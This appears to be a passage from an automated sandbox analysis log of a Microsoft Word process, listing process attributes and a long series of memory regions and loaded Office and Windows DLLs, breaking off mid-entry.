# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Jan 30 2018 10:40:05 # Log Creation Date: 02.02.2018 16:47:29.959 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x6294e000" os_pid = "0xa0c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 133 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 134 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 135 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 136 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 137 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 138 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 139 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 140 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 141 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 142 start_va = 0x100000 end_va = 0x106fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 143 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 144 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 145 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 146 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 147 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 148 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 149 start_va = 0x260000 end_va = 0x262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 150 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 151 start_va = 0x280000 end_va = 0x282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 152 start_va = 0x290000 end_va = 0x292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 153 start_va = 0x2a0000 end_va = 0x2a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 154 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 155 start_va = 0x2c0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 156 start_va = 0x2d0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 157 start_va = 0x310000 end_va = 0x317fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 158 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 159 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 160 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 161 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 162 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 163 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 164 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 165 start_va = 0x870000 end_va = 0x1c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 166 start_va = 0x1c70000 end_va = 0x1f3efff entry_point = 0x1c70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 167 start_va = 0x1f40000 end_va = 0x2332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 168 start_va = 0x2340000 end_va = 0x243ffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 169 start_va = 0x2440000 end_va = 0x2440fff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 170 start_va = 0x2450000 end_va = 0x2450fff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 171 start_va = 0x2460000 end_va = 0x2487fff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 172 start_va = 0x2490000 end_va = 0x2490fff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 173 start_va = 0x24a0000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 174 start_va = 0x2520000 end_va = 0x25fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002520000" filename = "" Region: id = 175 start_va = 0x2600000 end_va = 0x2604fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 176 start_va = 0x2610000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 177 start_va = 0x2620000 end_va = 0x2620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 178 start_va = 0x2630000 end_va = 0x2630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002630000" filename = "" Region: id = 179 start_va = 0x2640000 end_va = 0x273ffff entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 180 start_va = 0x2740000 end_va = 0x27fffff entry_point = 0x2740000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 181 start_va = 0x2800000 end_va = 0x286afff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 182 start_va = 0x2870000 end_va = 0x2870fff entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 183 start_va = 0x2880000 end_va = 0x2881fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 184 start_va = 0x2890000 end_va = 0x2890fff entry_point = 0x2890000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 185 start_va = 0x28a0000 end_va = 0x28a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 186 start_va = 0x28b0000 end_va = 0x28b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028b0000" filename = "" Region: id = 187 start_va = 0x28c0000 end_va = 0x29bffff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 188 start_va = 0x29c0000 end_va = 0x29f5fff entry_point = 0x29c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 189 start_va = 0x2a00000 end_va = 0x2a24fff entry_point = 0x2a00000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db") Region: id = 190 start_va = 0x2a30000 end_va = 0x2a30fff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 191 start_va = 0x2a40000 end_va = 0x2b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 192 start_va = 0x2b40000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 193 start_va = 0x2d40000 end_va = 0x2dbefff entry_point = 0x2d40000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 194 start_va = 0x2de0000 end_va = 0x2deffff entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 195 start_va = 0x2e10000 end_va = 0x2e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 196 start_va = 0x2e80000 end_va = 0x2f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 197 start_va = 0x2ff0000 end_va = 0x30effff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 198 start_va = 0x3140000 end_va = 0x31bffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 199 start_va = 0x3260000 end_va = 0x335ffff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 200 start_va = 0x33a0000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 201 start_va = 0x34a0000 end_va = 0x389ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034a0000" filename = "" Region: id = 202 start_va = 0x38a0000 end_va = 0x41cffff entry_point = 0x38a0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 203 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 204 start_va = 0x42f0000 end_va = 0x43effff entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 205 start_va = 0x44c0000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 206 start_va = 0x4580000 end_va = 0x458ffff entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 207 start_va = 0x4590000 end_va = 0x468ffff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 208 start_va = 0x4760000 end_va = 0x47dffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 209 start_va = 0x47e0000 end_va = 0x4fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047e0000" filename = "" Region: id = 210 start_va = 0x5060000 end_va = 0x515ffff entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 211 start_va = 0x5240000 end_va = 0x533ffff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 212 start_va = 0x5340000 end_va = 0x573ffff entry_point = 0x0 region_type = private name = "private_0x0000000005340000" filename = "" Region: id = 213 start_va = 0x5740000 end_va = 0x583ffff entry_point = 0x0 region_type = private name = "private_0x0000000005740000" filename = "" Region: id = 214 start_va = 0x5840000 end_va = 0x683ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005840000" filename = "" Region: id = 215 start_va = 0x6840000 end_va = 0x6971fff entry_point = 0x0 region_type = private name = "private_0x0000000006840000" filename = "" Region: id = 216 start_va = 0x6990000 end_va = 0x6a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006990000" filename = "" Region: id = 217 start_va = 0x6b10000 end_va = 0x6b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006b10000" filename = "" Region: id = 218 start_va = 0x6cf0000 end_va = 0x6d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000006cf0000" filename = "" Region: id = 219 start_va = 0x6d70000 end_va = 0x716ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d70000" filename = "" Region: id = 220 start_va = 0x71d0000 end_va = 0x72cffff entry_point = 0x0 region_type = private name = "private_0x00000000071d0000" filename = "" Region: id = 221 start_va = 0x73e0000 end_va = 0x745ffff entry_point = 0x0 region_type = private name = "private_0x00000000073e0000" filename = "" Region: id = 222 start_va = 0x7460000 end_va = 0x7c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000007460000" filename = "" Region: id = 223 start_va = 0x7c60000 end_va = 0x8060fff entry_point = 0x0 region_type = private name = "private_0x0000000007c60000" filename = "" Region: id = 224 start_va = 0x8070000 end_va = 0x8470fff entry_point = 0x0 region_type = private name = "private_0x0000000008070000" filename = "" Region: id = 225 start_va = 0x8480000 end_va = 0x8880fff entry_point = 0x0 region_type = private name = "private_0x0000000008480000" filename = "" Region: id = 226 start_va = 0x8890000 end_va = 0x8a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000008890000" filename = "" Region: id = 227 start_va = 0x36e80000 end_va = 0x36e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000036e80000" filename = "" Region: id = 228 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 229 start_va = 0x74a10000 end_va = 0x74a42fff entry_point = 0x74a10000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 230 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 231 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 232 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 233 start_va = 0x77260000 end_va = 0x77266fff entry_point = 0x77260000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 234 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 235 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 236 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 237 start_va = 0x13fe80000 end_va = 0x14005afff entry_point = 0x13fe80000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe") Region: id = 238 start_va = 0x7febe960000 end_va = 0x7febe96ffff entry_point = 0x0 region_type = private name = "private_0x000007febe960000" filename = "" Region: id = 239 start_va = 0x7fee3f30000 end_va = 0x7fee4a28fff entry_point = 0x7fee3f30000 region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll") Region: id = 240 start_va = 0x7fee4a30000 end_va = 0x7fee4c52fff entry_point = 0x7fee4a30000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 241 start_va = 0x7fee4d90000 end_va = 0x7fee4e28fff entry_point = 0x7fee4d90000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 242 start_va = 0x7fee4e30000 end_va = 0x7fee4e9efff entry_point = 0x7fee4e30000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 243 start_va = 0x7fee4ea0000 end_va = 0x7fee501dfff entry_point = 0x7fee4ea0000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 244 start_va = 0x7fee5020000 end_va = 0x7fee51effff entry_point = 0x7fee5020000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 245 start_va = 0x7fee51f0000 end_va = 0x7fee535ffff entry_point = 0x7fee51f0000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll") Region: id = 246 start_va = 0x7fee5360000 end_va = 0x7feea19efff entry_point = 0x7fee5360000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 247 start_va = 0x7feea1a0000 end_va = 0x7feeaac0fff entry_point = 0x7feea1a0000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 248 start_va = 0x7feeaad0000 end_va = 0x7feeadd7fff entry_point = 0x7feeaad0000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 249 start_va = 0x7feeade0000 end_va = 0x7feec0bbfff entry_point = 0x7feeade0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 250 start_va = 0x7feec0c0000 end_va = 0x7feec88bfff entry_point = 0x7feec0c0000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 251 start_va = 0x7feec890000 end_va = 0x7feed17afff entry_point = 0x7feec890000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 252 start_va = 0x7feed180000 end_va = 0x7feed5f7fff entry_point = 0x7feed180000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 253 start_va = 0x7feed600000 end_va = 0x7feed903fff entry_point = 0x7feed600000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 254 start_va = 0x7feed910000 end_va = 0x7feeea7bfff entry_point = 0x7feed910000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll") Region: id = 255 start_va = 0x7feeea80000 end_va = 0x7fef0e1efff entry_point = 0x7feeea80000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 256 start_va = 0x7fef0e90000 end_va = 0x7fef100afff entry_point = 0x7fef0e90000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 257 start_va = 0x7fef1010000 end_va = 0x7fef10cbfff entry_point = 0x7fef1010000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 258 start_va = 0x7fef10d0000 end_va = 0x7fef1195fff entry_point = 0x7fef10d0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 259 start_va = 0x7fef11a0000 end_va = 0x7fef11dafff entry_point = 0x7fef11a0000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 260 start_va = 0x7fef12c0000 end_va = 0x7fef12f9fff entry_point = 0x7fef12c0000 region_type = mapped_file name = "onbttnwd.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll") Region: id = 261 start_va = 0x7fef3780000 end_va = 0x7fef378bfff entry_point = 0x7fef3780000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 262 start_va = 0x7fef3bb0000 end_va = 0x7fef3bb2fff entry_point = 0x7fef3bb0000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll") Region: id = 263 start_va = 0x7fef3bc0000 end_va = 0x7fef3bc2fff entry_point = 0x7fef3bc0000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 264 start_va = 0x7fef3d90000 end_va = 0x7fef3d92fff entry_point = 0x7fef3d90000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 265 start_va = 0x7fef3da0000 end_va = 0x7fef3da2fff entry_point = 0x7fef3da0000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 266 start_va = 0x7fef3db0000 end_va = 0x7fef3db2fff entry_point = 0x7fef3db0000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll") Region: id = 267 start_va = 0x7fef3dc0000 end_va = 0x7fef3dc2fff entry_point = 0x7fef3dc0000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 268 start_va = 0x7fef3dd0000 end_va = 0x7fef3ec1fff entry_point = 0x7fef3dd0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll") Region: id = 269 start_va = 0x7fef3ed0000 end_va = 0x7fef3ed6fff entry_point = 0x7fef3ed0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 270 start_va = 0x7fef3ee0000 end_va = 0x7fef4008fff entry_point = 0x7fef3ee0000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 271 start_va = 0x7fef4010000 end_va = 0x7fef4089fff entry_point = 0x7fef4010000 region_type = mapped_file name = "appvisvstream64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll") Region: id = 272 start_va = 0x7fef4090000 end_va = 0x7fef42c5fff entry_point = 0x7fef4090000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 273 start_va = 0x7fef4a60000 end_va = 0x7fef4c51fff entry_point = 0x7fef4a60000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 274 start_va = 0x7fef4cf0000 end_va = 0x7fef4d60fff entry_point = 0x7fef4cf0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 275 start_va = 0x7fef5240000 end_va = 0x7fef524efff entry_point = 0x7fef5240000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 276 start_va = 0x7fef5250000 end_va = 0x7fef5276fff entry_point = 